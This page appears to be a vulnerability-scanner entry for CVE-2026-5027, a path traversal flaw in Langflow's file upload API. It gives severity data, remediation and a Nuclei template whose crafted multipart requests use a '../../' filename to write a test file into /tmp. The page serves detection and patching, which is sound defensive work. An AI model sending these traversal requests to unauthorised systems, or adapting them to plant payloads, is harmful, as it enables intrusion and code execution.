Langflow <= 1.8.4 - Path Traversal to RCE via File Upload
CVE-2026-5027
Verified
Description
The application contains a path traversal vulnerability caused by unsanitized 'filename' parameter in the 'POST /api/v2/files' multipart form data, letting attackers write files to arbitrary filesystem locations, exploit requires crafted request.
Severity
High
CVSS Score
8.8
Exploit Probability
2%
Affected Product
langflow
Published Date
June 9, 2026
Template Author
pussycat0x
CVE-2026-5027.yaml
id: CVE-2026-5027
info:
name: Langflow <= 1.8.4 - Path Traversal to RCE via File Upload
author: pussycat0x
severity: high
description: |
The application contains a path traversal vulnerability caused by unsanitized 'filename' parameter in the 'POST /api/v2/files' multipart form data, letting attackers write files to arbitrary filesystem locations, exploit requires crafted request.
impact: |
Attackers can write files to arbitrary locations, potentially leading to system compromise or data tampering.
remediation: |
Sanitize the 'filename' parameter to prevent path traversal or update to the latest secure version.
reference:
- https://github.com/langflow-ai/langflow/pull/12227
- https://github.com/0xBlackash/CVE-2026-5027
- https://github.com/langflow-ai/langflow/security/advisories/GHSA-g2j9-7rj2-gm6c
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2026-5027
epss-score: 0.02104
epss-percentile: 0.79506
cwe-id: CWE-22
metadata:
max-request: 2
vendor: langflow-ai
product: langflow
shodan-query: title:"Langflow"
fofa-query: title="Langflow"
tags: cve,cve2026,langflow,lfi,intrusive,vkev
flow: http(1) || http(2)
http:
- raw:
- |
GET /api/v1/auto_login HTTP/1.1
Host: {{Hostname}}
Accept: application/json
- |
POST /api/v2/files HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer {{access_token}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarya3f2c8d9e7b14650
------WebKitFormBoundarya3f2c8d9e7b14650
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../tmp/{{randstr}}.txt"
Content-Type: text/plain
{{randstr}}
------WebKitFormBoundarya3f2c8d9e7b14650--
matchers:
- type: dsl
dsl:
- "status_code_2 == 201"
- "contains_all(body_2, 'id','name','path')"
condition: and
extractors:
- type: json
name: access_token
part: body_1
json:
- ".access_token"
internal: true
- type: json
part: body_2
json:
- ".path"
- raw:
- |
POST /api/v1/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept: application/json
username={{username}}&password={{password}}
- |
POST /api/v2/files HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer {{access_token}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarya3f2c8d9e7b14650
------WebKitFormBoundarya3f2c8d9e7b14650
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../tmp/{{randstr}}.txt"
Content-Type: text/plain
{{randstr}}
------WebKitFormBoundarya3f2c8d9e7b14650--
matchers:
- type: dsl
dsl:
- "status_code_2 == 201"
- "contains_all(body_2, 'id','name','path')"
condition: and
extractors:
- type: json
name: access_token
part: body_1
json:
- ".access_token"
internal: true
- type: json
part: body_2
json:
- ".path"
# digest: 4b0a00483046022100c260f8a64543fe45d57e81087a6177430662481d7197b5eebc6956ec3d1fa14c022100e8e557de9a9e4d8657404fb27d065893ce5442db5fc126759439262f3b843363:922c64590222798bb761d5b6d8e729508.8Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2026-5027
CWE ID:
cwe-22
Remediation Steps
Sanitize the 'filename' parameter to prevent path traversal or update to the latest secure version.